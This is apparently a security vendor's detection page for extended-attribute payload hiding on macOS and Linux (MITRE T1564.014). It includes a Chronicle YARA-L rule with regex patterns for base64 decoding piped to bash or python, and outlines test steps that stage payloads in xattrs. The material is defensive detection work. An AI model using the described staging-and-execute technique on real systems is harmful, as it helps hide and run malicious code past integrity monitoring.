Detect Extended Attributes in Google Chronicle
Adversaries may abuse extended attributes (xattrs) on macOS and Linux to hide malicious data and evade detection. Extended attributes are key-value pairs of metadata attached to files and directories that are invisible to standard tools like ls, cat, and Finder. They require dedicated utilities — xattr on macOS, or getfattr/setfattr on Linux — for inspection. An adversary embeds a Base64-encoded second-stage payload into an xattr of a legitimate file (using xattr -w on macOS or setfattr on Linux), then a loader script retrieves the attribute value, decodes it, and pipes it to a scripting interpreter (bash, python, etc.) for execution. Because the primary file content and cryptographic hash remain unchanged, file integrity monitoring and hash-based detection will not flag the carrier file. This technique has been observed in Lazarus Group (APT38) campaigns where custom xattr names mimicking system attributes were used to store encrypted shellcode.
MITRE ATT&CK
- Tactic
- Defense Evasion
- Technique
- T1564 Hide Artifacts
- Sub-technique
- T1564.014 Extended Attributes
- Canonical reference
- https://attack.mitre.org/techniques/T1564/014/
YARA-L Detection Query
rule t1564_014_extended_attribute_abuse {
meta:
author = "Argus Detection Engineering"
description = "Detects Extended Attribute (xattr/setfattr/getfattr) abuse for payload staging and execution evasion on macOS and Linux (T1564.014)"
mitre_attack_tactic = "Defense Evasion"
mitre_attack_technique = "T1564.014"
severity = "HIGH"
confidence = "HIGH"
reference = "https://attack.mitre.org/techniques/T1564/014/"
created = "2026-04-21"
events:
$e.metadata.event_type = "PROCESS_LAUNCH"
$e.principal.hostname = $hostname
$e.principal.user.userid = $user
$e.target.process.command_line = $cmdline
(
// macOS: xattr write — embedding payload
(
re.regex($e.target.process.file.full_path, `/xattr$`) and
re.regex($e.target.process.command_line, `\s(-w|--set|-wx)\s`)
) or
// Linux: setfattr — writing user-namespace attributes
(
re.regex($e.target.process.file.full_path, `/setfattr$`) and
re.regex($e.target.process.command_line, `\s-n\s`)
) or
// Linux: getfattr extraction with raw value output
(
re.regex($e.target.process.file.full_path, `/getfattr$`) and
re.regex($e.target.process.command_line, `(--only-values|-e\s)`)
) or
// macOS: xattr read — retrieving stored payload
(
re.regex($e.target.process.file.full_path, `/xattr$`) and
re.regex($e.target.process.command_line, `\s(-p|--print)\s`)
) or
// Interpreter spawned from xattr/getfattr parent chain with decode/exec patterns
(
re.regex($e.target.process.file.full_path, `/(bash|sh|zsh|python3?|perl|ruby)$`) and
re.regex($e.target.process.parent_process.file.full_path, `/(xattr|getfattr|bash|sh|zsh)$`) and
(
re.regex($e.target.process.parent_process.command_line, `(xattr\s+-p|getfattr\s+--only-values)`) or
re.regex($e.target.process.command_line, `(base64\s+-d|base64\s+--decode|\|bash|\|\s*sh|\|\s*python|eval\(|exec\()`)
)
)
)
// Enrich: flag non-standard namespaces (exclude known benign Apple xattr names)
not re.regex($e.target.process.command_line,
`(com\.apple\.quarantine|com\.apple\.metadata|com\.apple\.FinderInfo|com\.apple\.lastuseddate|com\.apple\.ResourceFork)`
)
match:
$hostname, $user over 30m
outcome:
$risk_score = max(
if(re.regex($cmdline, `(base64|-d|--decode|frombase64|b64decode)`) and
re.regex($cmdline, `(\|bash|\|sh|\|python|eval\(|exec\()`), 90,
if(re.regex($cmdline, `(\|bash|\|sh|\|python|eval\(|exec\()`), 75,
if(re.regex($cmdline, `(user\.|trusted\.|security\.)`), 60,
50))
)
$has_base64 = re.regex($cmdline, `(base64|b64decode|frombase64)`)
$has_exec_pipe = re.regex($cmdline, `(\|bash|\|sh|\|python|eval\(|exec\()`)
$is_write = re.regex($cmdline, `(-w\s|--set\s|-wx\s|setfattr)`)
$is_read = re.regex($cmdline, `(-p\s|--print\s|--only-values)`)
condition:
$e
}Chronicle YARA-L 2.0 rule detecting Extended Attribute abuse (T1564.014) using UDM process launch events. Matches xattr/setfattr/getfattr operations with suspicious patterns including base64 encoding, pipe-to-interpreter execution chains, and non-standard xattr namespaces. Outcome scoring prioritizes combined decode+execute indicators as highest risk.
Data Sources
Required Tables
False Positives & Tuning
- Enterprise MDM solutions (Jamf, Kandji, Microsoft Intune for macOS) that programmatically manage xattr metadata on managed device files as part of policy enforcement and configuration profile application
- Developer toolchain scripts that use xattr to tag build artifacts with versioning or signing metadata — commonly seen in Xcode build phases calling xattr -w com.custom.buildversion on output binaries
- Linux filesystem administrative tasks (e.g., Samba share management using setfattr to apply DOS attributes, POSIX ACL tools calling setfattr with system.posix_acl_access namespace values)
Other platforms for T1564.014
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1macOS: Embed Base64 Payload in Extended Attribute and Execute via Bash
Expected signal: DeviceProcessEvents (macOS Defender): (1) xattr process with ProcessCommandLine '-w user.hidden_loader <base64_string> /tmp/df00tech_xattr_carrier.txt'; (2) xattr process with ProcessCommandLine '-p user.hidden_loader /tmp/df00tech_xattr_carrier.txt'; (3) bash process spawned from the shell pipeline with the decoded command. Unified Log: xattr invocations under invoking shell process context. DeviceFileEvents: possible FileModified event for carrier file if EDR tracks xattr changes as metadata modifications.
- Test 2Linux: Store and Execute Payload via setfattr/getfattr in user. Namespace
Expected signal: auditd (requires execve rule): SYSCALL execve records for setfattr (TYPE=EXECVE with a[0]='setfattr', a[1]='-n', a[2]='user.system_metadata') and getfattr (with '--only-values'). DeviceProcessEvents (Defender for Linux): setfattr process with full command line, getfattr process with --only-values flag, bash process spawned via pipe. The carrier file hash (sha256sum /tmp/df00tech_config.json) remains identical before and after setfattr — demonstrating FIM evasion.
- Test 3Linux: Python Loader Extracting and Executing Xattr Payload In-Memory (APT-Style Stager)
Expected signal: auditd: setfattr execve record writing user.app_config attribute; python3 execve record with proctitle showing subprocess.check_output, getfattr, --only-values, base64.b64decode, exec(). getfattr invoked as child process of python3 (PPID of getfattr matches PID of python3). No additional file written to disk during execution — exec() runs the decoded Python code within the existing interpreter process. DeviceProcessEvents: python3 process with full command line containing all loader indicators.
- Test 4macOS: Verify Extended Attribute Persists Through Hash Integrity Check (FIM Evasion Proof)
Expected signal: DeviceProcessEvents: xattr process with CommandLine '-w user.evasion_test <base64_payload> /tmp/df00tech_fim_evasion_test.txt'. DeviceFileEvents: FileModified event for the carrier file if EDR tracks EA changes as file system events (EDR-dependent). SHA256 hash: identical before and after — file integrity monitoring tools relying solely on cryptographic hashes will NOT generate an alert. This outcome is expected and demonstrates the detection gap.
References (9)
- https://attack.mitre.org/techniques/T1564/014/
- https://kernal.eu/posts/linux-xattr-persistence/
- https://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/
- https://ss64.com/mac/xattr.html
- https://linux.die.net/man/1/setfattr
- https://linux.die.net/man/1/getfattr
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.014/T1564.014.md
- https://objective-see.org/blog/blog_0x25.html
- https://learn.microsoft.com/en-us/defender-endpoint/linux-support-install
Unlock Pro Content
Get the full detection package for T1564.014 including response playbook, investigation guide, and atomic red team tests.